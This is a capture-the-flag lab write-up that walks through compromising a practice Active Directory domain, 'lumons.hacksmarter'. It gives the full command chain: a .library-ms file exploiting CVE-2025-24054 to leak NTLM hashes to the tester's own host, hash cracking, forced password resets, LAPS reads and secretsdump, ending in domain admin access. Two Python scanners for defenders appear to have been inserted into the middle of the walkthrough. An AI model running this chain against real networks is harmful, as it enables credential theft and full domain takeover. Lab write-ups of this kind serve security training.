# Lumon Industries

{% embed url="https://www.hacksmarter.org/courses/a952a025-4b22-47cd-bd75-d92cf5e524e9" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Scenario

### Objective / Scope <a href="#user-content-objective--scope" id="user-content-objective--scope"></a>

Lumon Industries will soon be integrating a high-value employee into the organization. In accordance with internal security protocols, a comprehensive penetration test and internal access verification must be conducted prior to full onboarding.

For the purposes of this evaluation, you will be provided the assigned credentials and access permissions corresponding to the subject employee. Your objective is to assess the scope and boundaries of these permissions, ensuring compliance with all Lumon security standards and operational safeguards.

**Starting Credentials**

```
hellyr:H3lenaR!2025
```

## Summary

<details>

<summary>Summary</summary>

In Lumon Industries we begin with domain credentials and assess internal access boundaries within the `lumons.hacksmarter` environment. Enumerating network hosts reveals an intranet web application and SMB shares accessible to the provided user. Leveraging write permissions on a shared folder, we weaponize a malicious `.library-ms` file to exploit `CVE-2025-24054` and coerce NTLM authentication, capturing and cracking the credentials of `harmonyc`, an administrative user. Using these, we gain admin access on the web portal and trigger another NTLM leak via the admin interface, recovering the `IntranetSvc` service account. Enumeration in BloodHound shows this account can reset passwords for other users, allowing us to take over `marks`, a member of the `LAPSAdmins` group. By reading the LAPS-stored local administrator password, we gain full control of the Intranet host, elevate `marks` to a local Administrator, and extract credentials for `hellye`, a Domain Administrator. Cracking the recovered hash provides domain admin access on DC01.

</details>

## Recon

In our initial reconnaissance phase, we perform a port scan on every available machine and manually probe the services available.

### DC01

We use rustscan `-b 500 -a 10.1.194.227 -- -sC -sV -Pn` to enumerate all TCP ports on the `DC01` machine, piping the discovered results into Nmap which runs default NSE scripts `-sC`, service and version detection `-sV`, and treats the host as online without ICMP echo `-Pn`.

A batch size of `500` trades speed for stability; the default `1500` balances both, while much larger sizes increase throughput but risk missed responses and instability.

```
rustscan -b 500 -a 10.1.194.227 -- -sC -sV -Pn
```

<figure><img src="/files/Dr2MAPU0eclNfkDqRCfd" alt=""><figcaption></figcaption></figure>

DC01 is the domain controller with exposed services including DNS `53`, Kerberos `88/464`, multiple MSRPC endpoints `135, 593, 49664+`, SMB `139/445`, LDAP and LDAPS `389/636/3268/3269` tied to Active Directory, RDP `3389`, and .NET Remoting `9389`. This indicates a fully integrated Windows AD environment where LDAP/LDAPS and Kerberos provide authentication, SMB and RPC enable remote management, and RDP/WinRM serve as remote access points.

<figure><img src="/files/TcBUwTvN4f2U0yM4TJnM" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/trKPrTKIiKiOh24dkpuJ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ortAMPBh7xwK1Qo676I2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/WXPqlTxlHB3DE7S7Oz39" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/X1bbEMbzXc8l1CqTw7rt" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/BPM2ssQ6kGzPR5tQIywO" alt=""><figcaption></figcaption></figure>

#### SMB

Before we dive in with the provided credentials, we try to authenticate as `guest` and anonymously against SMB, but without success. Nevertheless, we generate the hosts file entry as follows:

```
nxc smb 10.1.194.227 -u '' -p '' --generate-hosts-file hosts-DC
```

<figure><img src="/files/YzIb0pV0g8iWyiqd3XTm" alt=""><figcaption></figcaption></figure>

We add the following to our `/etc/hosts` file. We could also directly append the entry to our hosts file by providing the path to `/etc/hosts` in the NetExec command.

```
10.1.194.227     DC01.lumons.hacksmarter lumons.hacksmarter DC01
```

We are able to authenticate as `hellyr` with the provided password against the DC, but we do not find any interesting shares.

```
nxc smb DC01 -u 'hellyr' -p 'H3lenaR!2025' --shares
```

<figure><img src="/files/U46UHF1sAGKYQx1YgFGV" alt=""><figcaption></figcaption></figure>

#### BloodHound

With the credentials, we then enumerate the AD using BloodHound.

{% code overflow="wrap" %}

```
bloodhound-ce.py --zip -c All -d lumons.hacksmarter -u 'hellyr' -p 'H3lenaR!2025' -dc DC01.lumons.hacksmarter -ns 10.1.194.227
```

{% endcode %}

<figure><img src="/files/2h5pM8QuR8WD2R2YHPdG" alt=""><figcaption></figcaption></figure>

We see that the user has no special permissions, but is in the `MICRODATA REFINEMENT` group.

<figure><img src="/files/8JvwLM2zWViqtxnFQD7t" alt=""><figcaption></figcaption></figure>

We are able to identify `hellye` as one of the Domain Admins. For now, we will continue with the `Intranet` machine.

<figure><img src="/files/yK1UI9RlBx25UvVBbCN5" alt=""><figcaption></figcaption></figure>

### Intranet

We use rustscan `-b 500 -a 10.1.212.200 -- -sC -sV -Pn` to enumerate all TCP ports on the `Intranet` machine, piping the discovered results into Nmap which runs default NSE scripts `-sC`, service and version detection `-sV`, and treats the host as online without ICMP echo `-Pn`.

A batch size of `500` trades speed for stability; the default `1500` balances both, while much larger sizes increase throughput but risk missed responses and instability.

```
rustscan -b 500 -a 10.1.212.200 -- -sC -sV -Pn
```

<figure><img src="/files/g8kqle4lFTzMiWCfyMQF" alt=""><figcaption></figcaption></figure>

The `Intranet` machine has a web server available on port `80` in addition to SMB, RDP, and the RPC ports, as well as `5985` for Windows Remote Management. From this initial scan we can determine the actual machine name and domain.

<figure><img src="/files/GKGjApBOheCPCgZlrDro" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/IjNWBDa6sRXWydwaH8cT" alt=""><figcaption></figcaption></figure>

#### SMB

Here, too, we first try to authenticate as `guest` and anonymously against SMB, but without success. Nevertheless, we generate the hosts file entry as follows:

```
nxc smb 10.1.212.200 -u '' -p '' --generate-hosts-file hosts-Intranet
```

<figure><img src="/files/naBPftBPmKdyynFt2Dmk" alt=""><figcaption></figcaption></figure>

We add the following to our `/etc/hosts` file.

```
10.1.212.200     INTRANET.lumons.hacksmarter INTRANET
```

We enumerate the shares on `Intranet` as `hellyr` and identify the `MDRepo` share, to which we have `read` and `write` access.

```
nxc smb INTRANET -u 'hellyr' -p 'H3lenaR!2025' --shares
```

<figure><img src="/files/7vip1B1KARqfY3upYtrP" alt=""><figcaption></figcaption></figure>

We connect to the share using `smbclient.py` and find a `.url` and a `.pdf` file. We download those files but do not find a lead in there.

<details>

<summary>Hint</summary>

Since we have write access to that share, we could try to steal the NTLM hashes of users who regularly access the share. But more on that later. We move on to the web service.

</details>

```
smbclient.py hellyr@INTRANET
```

<figure><img src="/files/PtYRyIEicFdMmUM889x8" alt=""><figcaption></figcaption></figure>

#### WEB

We visit the site on port `80` and get redirected to the HTTPS service on port `443`.

<figure><img src="/files/OIpzAxRdceYhHki42HTe" alt=""><figcaption></figcaption></figure>

We try to log in as `hellyr` with the provided credentials.

<figure><img src="/files/EcAq06evzgQVs0nhTsac" alt=""><figcaption></figcaption></figure>

We are able to log in, but do not find anything useful yet.

<figure><img src="/files/14lEEykJmRGom1aFWYmv" alt=""><figcaption></figcaption></figure>

Next, we perform a directory scan using Feroxbuster and find a `terminal` and `admin` page, but we do not have access here as `hellyr`.

{% code overflow="wrap" %}

```
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u https://INTRANET.lumons.hacksmarter/ -k
```

{% endcode %}

<figure><img src="/files/XCaVtALsOC9IZvbrBcnR" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/fkdE3TYYjTigxgYbSiTW" alt=""><figcaption></figcaption></figure>

## Access as harmonyc

We recall our finding on the SMB shares, that we have write access to `MDRepo`, and the idea to steal the hashes of users accessing the share.

<figure><img src="/files/QYaZmwbqrNa6TyNoa8rI" alt=""><figcaption></figcaption></figure>

The Greenwolf `ntlm_theft` tool may help us out here. With it we are able to create up to 21 files that can be used for NTLM hash theft.

{% embed url="https://github.com/Greenwolf/ntlm_theft" %}

We generate the files...

```
ntlm_theft.py --generate modern --server 10.200.29.81 --filename "Lumons Intranet"
```

<figure><img src="/files/mAVjZ2mWoYSHtXaOqiNb" alt=""><figcaption></figcaption></figure>

... spin up responder...

{% embed url="https://github.com/SpiderLabs/Responder" %}

```
responder -I tun0
```

<figure><img src="/files/WUHvQtzUx8a1c80QEMHY" alt=""><figcaption></figcaption></figure>

... and put those files in the share, but we do not receive any hashes.

We recall a recent CVE, CVE-2025-24054, a Windows vulnerability that leaks NTLM hashes by tricking users into interacting with a `.library-ms` file.

Windows automatically attempts NTLM authentication when accessing remote resources, often without a clear warning to the user. This implicit trust in network locations makes it possible to coerce the system into sending credential material.

{% embed url="https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/" %}

The malicious `.library-ms` file described in the resource above points to a remote SMB/WebDAV share under our control, in this case the Responder listener. The vulnerability can be triggered with minimal user interaction, such as right-clicking, dragging and dropping, or simply navigating to the folder containing the malicious file. Windows then initiates an NTLM authentication request to that remote server, leaking the user's NTLM hash, which can then be relayed or cracked.

We use the following resource to generate the `.library-ms` file:

{% embed url="https://github.com/helidem/CVE-2025-24054_CVE-2025-24071-PoC" %}

```
python exploit.py
```

<figure><img src="/files/VvoyzsqVm6FjT4ihIseN" alt=""><figcaption></figcaption></figure>

```
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\10.200.29.81\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
```
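From the defender's side, the same file format is easy to audit: a `.library-ms` file that makes Explorer authenticate to a host outside the organisation is the indicator to look for on writable shares. The following scanner is an added example, not code from the writeup or the PoC repository; the sample library document, the `FS01` file server and the allowlist are constructed for illustration.

```python
from __future__ import annotations
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
# \\host\share, \\host and WebDAV forms such as \\host@80\DavWWWRoot
UNC_RE = re.compile(r"^\\\\([^\\\s]+)(?:\\|$)")
# http://, https:// and file://host/ locations; file:///C:/... carries no host
URL_RE = re.compile(r"^(?:https?|file)://([^/\s]+)", re.IGNORECASE)

# Constructed sample mirroring the library file above: an allowlisted internal
# file server, an external host, and a local known folder.
SAMPLE_LIBRARY = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\FS01\Documents</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>\\10.200.29.81\share</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

@dataclass
class Finding:
    url: str
    host: str
    suspicious: bool

def location_host(url: str) -> str | None:
    """Return the remote host a library location points at, or None if it is local."""
    url = url.strip()
    m = UNC_RE.match(url)
    if m:
        return m.group(1)
    m = URL_RE.match(url)
    if m:
        return None if m.group(1).lower() == "localhost" else m.group(1)
    return None  # C:\path, knownfolder:{GUID} and shell: entries stay local

def scan_library_ms(xml_text: str, allowed_hosts: set[str]) -> list[Finding]:
    """Classify every <url> in a .library-ms document against a host allowlist.
    All <url> elements are visited, not only simpleLocation, so a location put
    in an unexpected element is still examined."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for el in ET.fromstring(xml_text).iter(LIB_NS + "url"):
        host = location_host(el.text or "")
        if host is not None:
            findings.append(Finding(el.text.strip(), host, host.lower() not in allowed))
    return findings

def suspicious_hosts(xml_text: str, allowed_hosts: set[str]) -> list[str]:
    """Non-allowlisted hosts the file would make Explorer authenticate to."""
    return [f.host for f in scan_library_ms(xml_text, allowed_hosts) if f.suspicious]
```

Run over every `*.library-ms` found on a writable share, any host reported by `suspicious_hosts` is worth an alert, and blocking outbound SMB (445) and WebDAV at the perimeter removes the path the leak depends on.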

We place the file into the share using `smbclient.py`.

```
smbclient.py hellyr@INTRANET
```

```
use MDRepo
```

<figure><img src="/files/nkt0eNjFsoh9a6PzP3Cc" alt=""><figcaption></figcaption></figure>

```
put CVE-2025-24054_CVE-2025-24071-PoC/xd.library-ms
```

<figure><img src="/files/kGl6uyc0iFzJ3Z64oBEr" alt=""><figcaption></figcaption></figure>

After a short while we receive the NTLMv2-SSP hash of `harmonyc`, the manager mentioned in the PDF.

<figure><img src="/files/nzAa1jDRpUudT6dQtWzp" alt=""><figcaption></figcaption></figure>

We try to crack the hash and are successful.

```
hashcat -m 5600 harmonyc.NTLMv2-SSP /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/VvuJOPNwXr6zwbEnCg2U" alt=""><figcaption></figcaption></figure>

We authenticate as `harmonyc` on the domain controller and are successful.

```
nxc smb DC01 -u 'harmonyc' -p 'REDACTED' --shares
```

<figure><img src="/files/csfPdJZA72LjYKD3HJOU" alt=""><figcaption></figcaption></figure>

We mark the user as owned in BloodHound. We see that the user is part of the custom group `ADMINISTRATION`.

<figure><img src="/files/jjZ6ba1QzKJdnfzlyWlY" alt=""><figcaption></figcaption></figure>

## Access as IntranetSvc

We try to log in as `harmonyc` on the Intranet portal.

<figure><img src="/files/8EtoHIJfTAoUm7FOmMJk" alt=""><figcaption></figcaption></figure>

We are successful, and the admin and terminal pages are now accessible.

<figure><img src="/files/XP592Q26garPWBADRKuW" alt=""><figcaption></figcaption></figure>

Next, we visit the admin page and have three options available. We are able to unlock other AD accounts, ping servers and browse file shares.

```
https://intranet.lumons.hacksmarter/admin
```

<figure><img src="/files/i2lyPvmR1gcIBNyyxMBn" alt=""><figcaption></figcaption></figure>

With Responder still running, we provide our share as the path to browse:

```
\\10.200.29.81\share
```

<figure><img src="/files/uvVm0Yi7Kak6A13qHUa0" alt=""><figcaption></figcaption></figure>

And we immediately get the hash of `IntranetSvc`.

<figure><img src="/files/rdBMpjfaIz9lNLcqZIgM" alt=""><figcaption></figcaption></figure>

We try to crack it, and are successful.

```
hashcat -m 5600 IntranetSvc.NTLMv2-SSP /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/7UXyKZ9dDDP9KW3vmvTD" alt=""><figcaption></figcaption></figure>

We test the credentials using NetExec and are able to authenticate against SMB on DC01.

```
nxc smb DC01 -u 'IntranetSvc' -p 'REDACTED' --shares
```

<figure><img src="/files/ok3hNVKGh7nAXGGGFqtD" alt=""><figcaption></figcaption></figure>

## Shell as marks

We mark the user `IntranetSvc` as owned in BloodHound. The user `IntranetSvc` is a member of the `Web Admins` group.

<figure><img src="/files/xK6vGWOuk4stORBf3WK3" alt=""><figcaption></figcaption></figure>

Besides `IntranetSvc`, `peterk` is also a member of the `Web Admins` group.

<figure><img src="/files/9iyrN7v5lMyL7s8UhG68" alt=""><figcaption></figcaption></figure>

We have permission to change that user's password.

{% hint style="info" %}
One thing I didn't notice here is that the user is disabled, which could already have been identified in the BloodHound data (see the screenshot below). This part can be skipped ahead to `marks`, who has the same permissions, is not disabled, and whose password we can change too.
{% endhint %}

<figure><img src="/files/jkTMHbEVvAITWodZGYxS" alt=""><figcaption></figcaption></figure>

This is interesting because `peterk` is also a member of `LAPSAdmins`, which could mean that the user can read the attribute that stores the local admin password.

<figure><img src="/files/sLpIuPukt8ahqtsSJEDJ" alt=""><figcaption></figcaption></figure>

We use bloodyAD to change the password and try to authenticate against SMB, but get a timeout like the one depicted in `thehacker.recipes`.

{% embed url="https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword#forcechangepassword" %}

{% code overflow="wrap" %}

```
bloodyad -u 'IntranetSvc' -p 'REDACTED' --host DC01.lumons.hacksmarter set password 'PETERK' 'Pwned123@!'
```

{% endcode %}

```
nxc smb INTRANET -u 'peterk' -p 'Pwned123@!'
```

<figure><img src="/files/byuthDj9QGCqdt19Ltou" alt=""><figcaption></figcaption></figure>

Authenticating against LDAP shows why: the account is disabled. Had we paid a bit more attention to our BloodHound data, we would have saved some time.

```
nxc ldap DC01.lumons.hacksmarter -u 'peterk' -p 'Pwned123@!'
```

<figure><img src="/files/DglT8smdPlNTaUjuwj3A" alt=""><figcaption></figcaption></figure>
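The lesson above applies equally to whoever audits these edges: a `ForceChangePassword` edge to a disabled account is dead weight, while an edge to an enabled `LAPSAdmins` member is the one to remediate first. The triage below is an added example, not from the writeup or BloodHound; it decodes the documented `userAccountControl` bits and runs over constructed user records and edges chosen to mirror the situation here.

```python
from __future__ import annotations

# Documented userAccountControl bits, the subset that matters for account triage.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
}

# Constructed LDAP-style records mirroring the writeup: peterk is disabled,
# marks is enabled, both sit in LAPSAdmins. Values are not real domain data.
USERS = {
    "peterk": {"userAccountControl": 0x0202, "memberOf": ["Web Admins", "LAPSAdmins"]},
    "marks": {"userAccountControl": 0x10200, "memberOf": ["LAPSAdmins"]},
    "hellyr": {"userAccountControl": 0x0200, "memberOf": ["Microdata Refinement"]},
}
# Constructed ForceChangePassword edges: controlling principal -> targets.
FORCE_CHANGE_PASSWORD = {"IntranetSvc": ["peterk", "marks", "hellyr"]}

def decode_uac(value: int) -> set[str]:
    """Translate a raw userAccountControl integer into its set flag names."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}

def is_usable(record: dict) -> bool:
    """An account can only be logged into with a password if it is enabled
    and not restricted to smart-card logon."""
    return not decode_uac(record["userAccountControl"]) & {"ACCOUNTDISABLE", "SMARTCARD_REQUIRED"}

def triage_targets(controller: str, wanted_group: str) -> list[tuple[str, bool, bool]]:
    """(target, usable, member of wanted_group) for each ForceChangePassword target."""
    rows = []
    for target in FORCE_CHANGE_PASSWORD.get(controller, []):
        rec = USERS[target]
        rows.append((target, is_usable(rec), wanted_group in rec["memberOf"]))
    return rows

def priority_targets(controller: str, wanted_group: str) -> list[str]:
    """Usable targets that also hold the wanted group: these edges matter most."""
    return [t for t, usable, in_group in triage_targets(controller, wanted_group)
            if usable and in_group]
```

Note that the `LOCKOUT` bit is not reliably maintained in Active Directory; a real audit should read `lockoutTime` and `accountExpires` as well.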

We investigate the outbound object control of `IntranetSvc` and see that we could also change the passwords of other users. One of them is `marks`.

<figure><img src="/files/7kIoEKuIV1kbnteI9eQB" alt=""><figcaption></figcaption></figure>

That user is also a member of the `LAPSAdmins` group and is not disabled.

<figure><img src="/files/jEWX56YUHV5cHu2MO9lN" alt=""><figcaption></figcaption></figure>

We change the password of `marks`...

{% code overflow="wrap" %}

```
bloodyad -u 'IntranetSvc' -p 'REDACTED' --host DC01.lumons.hacksmarter set password 'marks' 'Pwned123@!'
```

{% endcode %}

<figure><img src="/files/RIlQlSFcQx5b7BsW6hJo" alt=""><figcaption></figcaption></figure>

... and try to log in using evil-winrm, and are able to connect. We find the user flag at `C:\Users\MarkS\Desktop\user.txt`.

```
evil-winrm -i INTRANET -u 'marks' -p 'Pwned123@!'
```

<figure><img src="/files/shO06rdQnXImUC29jhaK" alt=""><figcaption></figcaption></figure>

## Access as localadmin on INTRANET

Since the account is not disabled and this user is part of `LAPSAdmins`, we can now try to read the LAPS password of the computer account, i.e. the password of the computer's local administrator:

{% embed url="https://www.thehacker.recipes/ad/movement/dacl/readlapspassword#readlapspassword" %}

We use NetExec for our attempt and are able to read the `localadmin`'s password of the `Intranet` machine.

```
nxc ldap DC01.lumons.hacksmarter -u 'marks' -p 'Pwned123@!' --module laps
```

<figure><img src="/files/Yo31YL9Akp30CW18Qf9E" alt=""><figcaption></figcaption></figure>

We test whether we can authenticate to SMB on `Intranet` using the discovered credentials, and the authentication is successful.

```
nxc smb INTRANET -u 'localadmin' -p 'REDACTED' --local-auth
```

<figure><img src="/files/JfHkWbjvDlUHL1dcLBZ4" alt=""><figcaption></figcaption></figure>

## Shell as marks (added to Domain Admins)

As low-hanging fruit, we try to dump the SAM and LSA secrets on `Intranet`. This may allow us to find additional credentials.

After all, we have access as `localadmin`. Unfortunately, we are unable to authenticate cleanly as `localadmin` using `secretsdump.py`. NetExec modules such as `nanodump` or `lsassy` did not work, and flags such as `--lsa` and `--sam` do not work either (they at least require Domain Admin or local Administrator privileges on the target domain controller).

We are also able to get a Remote Desktop session as `localadmin`.

As `localadmin`, we can now try to grant a domain user we control local administration permissions by adding that user to Administrators, in order to remotely use `secretsdump.py` to dump the SAM and LSA secrets on `Intranet`.

We open a CMD terminal as administrator and issue the following command to add `marks` to the local Administrators group.

```
net localgroup Administrators marks /add
```

<figure><img src="/files/qJoGsihVFGIQHndhAcBx" alt=""><figcaption></figcaption></figure>

If we now authenticate as `marks` on INTRANET via SMB using NetExec, we see that we are now admin.

```
nxc smb INTRANET -u 'marks' -p 'Pwned123@!'
```

<figure><img src="/files/GHg1RQMZPiUwWWxn5Pha" alt=""><figcaption></figcaption></figure>

Next, we use `secretsdump.py` to dump the hashes and find the hash of `hellye`.

{% embed url="https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secrets#secrets-dump" %}

```
secretsdump.py 'lumons.hacksmarter/marks:Pwned123@!@INTRANET'
```

<figure><img src="/files/18H5eNwkey5b1mdiykYw" alt=""><figcaption></figcaption></figure>

Recalling our BloodHound enumeration we know that `hellye` is a Domain Administrator.

<figure><img src="/files/ACSrnFQhtSaAWUsHGqmV" alt=""><figcaption></figcaption></figure>

As a low-hanging fruit, we try to crack the DCC2 hash. This takes a little more time but is successful with `rockyou.txt`.

```
hashcat -m 2100 hellye.DCC2 /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/M4GnfeMxROM9JpX8JUrZ" alt=""><figcaption></figcaption></figure>

We are now able to authenticate as `hellye` on DC01 as a Domain Administrator.

```
nxc smb DC01.lumons.hacksmarter -u 'hellye' -p 'REDACTED'
```

<figure><img src="/files/fr8AeHT1mc2Mb7LFyngO" alt=""><figcaption></figcaption></figure>

From there we are able to retrieve the final flag using `smbclient.py`...

```
smbclient.py hellye@DC01
```

<figure><img src="/files/8Sy3TKiPcQkYT4VzcgOn" alt=""><figcaption></figcaption></figure>

... and connect to the domain controller using RDP as the Domain Admin.

<figure><img src="/files/dj1MEtBZVcARpLokpFyV" alt=""><figcaption></figcaption></figure>

